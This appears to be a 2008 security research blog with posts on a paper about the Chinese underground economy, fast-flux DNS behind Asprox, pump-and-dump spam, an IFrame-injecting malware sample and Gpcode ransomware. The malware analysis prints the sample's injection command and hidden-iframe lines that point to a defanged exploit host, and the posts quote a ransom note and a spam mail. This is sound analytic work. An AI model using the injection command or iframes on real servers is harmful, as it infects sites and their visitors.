honeyblog

The 7th Workshop on the Economics of Information Security (WEIS'08) took place last week at Dartmouth College's Tuck School of Business. Several interesting papers like "Security Economics and European Policy", "Do Data Breach Disclosure Laws Reduce Identity Theft?", or "The Impact of Incentives on Notice and Take-down" were presented during the workshop. Our paper entitled "Studying Malicious Websites and the Underground Economy on the Chinese Web" deals with several aspects of the underground economy within China's part of the World Wide Web. Amongst other techniques, we use client-side honeypots to study malicious websites.

Abstract:
The World Wide Web gains more and more popularity within China with more than 1.31 million websites on the Chinese Web in June 2007. Driven by the economic profits, cyber criminals are on the rise and use the Web to exploit innocent users. In fact, a real underground black market with thousand of participants has developed which brings together malicious users who trade exploits, malware, virtual assets, stolen credentials, and more. In this paper, we provide a detailed overview of this underground black market and present a model to describe the market. We substantiate our model with the help of measurement results within the Chinese Web. First, we show that the amount of virtual assets traded on this underground market is huge. Second, our research proves that a significant amount of websites within China’s part of the Web contain some kind of malicious content: our measurements reveal that about 1.49% of the examined sites contain malicious content that tries to attack the visitor’s browser.

The paper is a collaboration with several researchers from China (Jianwei Zhuge, Chengyu Song, Jinpeng Guo, Xinhui Han, and Wei Zou) and a revised version of our technical report on the same topic. The full version of the paper is now available.

Danmec/Asprox is an SQL injection attack tool that is responsible for some aspects of the recent wave of SQL injections (full list maintained by ShadowServer). This malware also uses fast-flux techniques to host some facets of the attacks. Since a few days, the attackers also use the .mobi TLD - the first time I see this TLD being abused this way by malware. The following listing shows the results of a DNS lookup for one of the .mobi domains:

$ dig allocbn.mobi

; <<>> DiG 9.3.4 <<>> allocbn.mobi
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26203
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;allocbn.mobi. IN A

;; ANSWER SECTION:
allocbn.mobi. 600 IN A 200.167.230.85
allocbn.mobi. 600 IN A 69.247.175.135
allocbn.mobi. 600 IN A 71.56.42.87
allocbn.mobi. 600 IN A 72.187.108.240
allocbn.mobi. 600 IN A 74.138.199.132
allocbn.mobi. 600 IN A 75.66.193.0
allocbn.mobi. 600 IN A 75.143.150.108
allocbn.mobi. 600 IN A 76.175.178.111
allocbn.mobi. 600 IN A 98.165.213.34
allocbn.mobi. 600 IN A 98.192.74.13
allocbn.mobi. 600 IN A 98.223.61.12
allocbn.mobi. 600 IN A 99.233.217.232
allocbn.mobi. 600 IN A 118.160.173.122
allocbn.mobi. 600 IN A 190.18.116.54

The DNS answer has a short time to live (600 seconds - 10 minutes) and the IP addresses are located in many different networks - a typical sign for fast-flux techniques. Most IP addresses are located in dial-up networks like Comcast and Roadrunner, presumably these machines are infected and compromised machines. When doing a DNS lookup a couple of minutes later, a different set of IP addresses is returned:

;; ANSWER SECTION:
allocbn.mobi. 493 IN A 208.107.82.31 [NEW]
allocbn.mobi. 493 IN A 71.56.42.87
allocbn.mobi. 493 IN A 72.177.224.125 [NEW]
allocbn.mobi. 493 IN A 72.187.175.42 [NEW]
allocbn.mobi. 493 IN A 75.143.150.108
allocbn.mobi. 493 IN A 76.171.151.145 [NEW]
allocbn.mobi. 493 IN A 76.175.178.111
allocbn.mobi. 493 IN A 81.203.14.159 [NEW]
allocbn.mobi. 493 IN A 92.233.227.123 [NEW]
allocbn.mobi. 493 IN A 98.165.213.34
allocbn.mobi. 493 IN A 98.192.74.13
allocbn.mobi. 493 IN A 98.223.61.12
allocbn.mobi. 493 IN A 99.233.217.232
allocbn.mobi. 493 IN A 156.34.132.62 [NEW]

This indicates the "fluxiness" of the domain. By DNS mining, i.e., performing DNS lookups of this domain every TTL +1 seconds, we can observe the botnet behind this attack. In the past week, we found about 1,000 unique bot IP addresses this way.

Pump and dump schemes for penny stocks based on spam mails were quite common in the years 2006 and 2007. Nowadays, however, it seems like these schemes are over and I receive such mails only very seldom. One recent example of such a scam mail is:

Now see for yourself.

Corporation: Angstrom Microsystems
Symbol OTCBB: agms
Suggested: Buy/hold
Monday close : .400
Shares traded: 331,485

Excellent release last week and investors are noticing and volume is up.

This is the beginning of great things, sales are up and deployment is increasing Angstrom Microsystems will blow you away.

Move before it's too late, obtain this stock NOW.

Please note that I modified the mail text to increase readability.
Such schemes work in practice and spam mails can actually influence the stock market as we showed in a study. This works since the quote of a penny stock can be influenced with a relative low number of trades.

Recently Sophos blogged about a spam campaign in which the mails contained a text about the downtime of Amazon. They theorized that these spam mails are used for shorting the Amazon stock for Short and Distort scams. I doubt that this is true - especially given the fact that more than five million Amazon stocks are traded per day...

Attacks against web servers are en vogue nowadays. This can be mass SQL injection attacks that insert malicious JavaScript into web sites or other forms of IFrame injection attacks.

Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs or by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll and npptools.dll which are all related to packet processing. Furthermore, two executables 3.tmp and 6.tmp are created.

Then the file 6.tmp is executed with the command line parameter

-idx 0 -ip $IP-RANGE -port 80 -insert "< if rame sr c="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"

The intention is that the infected machines should scan a specific network range for web servers on port 80 and then try to inject a specific IFrame into vulnerable servers.

An analysis of the injected site leads to more malware. The HTML file contains for example four more IFrames:

IF RAME sr c="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>

As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or Real Player 11. Each of these exploits tries to install additional malware.

Recently a new variant of Gpcode was detected by the researchers from Kaspersky Lab. Gpcode is a form of ransomware, a pretty nasty form of malware that is used in extortion attempts. The basic idea of such malware is to encrypt certain files on the hard disk with a key only known to the attacker and then blackmail the victim to press money.

Upon startup, Gpcode.ak searches for specific files on the disk (extensions are for example .htm, .jpg, and .inc) and encrypts them with a 1024 bit RSA key. The file extension is then replaced with $ORIGINAL._CRYPT. Once this is finished, the malware displays a pop-up with the following text:

Your files are encrypted with RSA-1024 algorithm. To recovery your files you need to buy our decryptor. To buy decrypting tool contact us at: cipher4000@yahoo.com

Furthermore, also a file named !READ_ME!.txt is created on the disk that contains the following text:

Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: cipher4000@yahoo.com

=== BEGIN ===
AD7D6889
010200000168000000A400008EE1630FA688F194
42766F3AE19D5483AAE44C246F66C15F5C6D0E38
0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF
151ED9365CD730BE54263C3E2FDCEDF8546FF33E
5017032833DCB0C306EA28D79CD6DB4C0E7CE96D
3B84E83EEC84740FED2D64B672148E6F86B06B16
890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C
=== END ===

Kasperky Labs called for aid to "Help crack Gpcode", but I doubt that cracking this key is successful. Dancho has some more info on Gpcode.ak in his blog. Furthermore, the full CWSandbox report is available.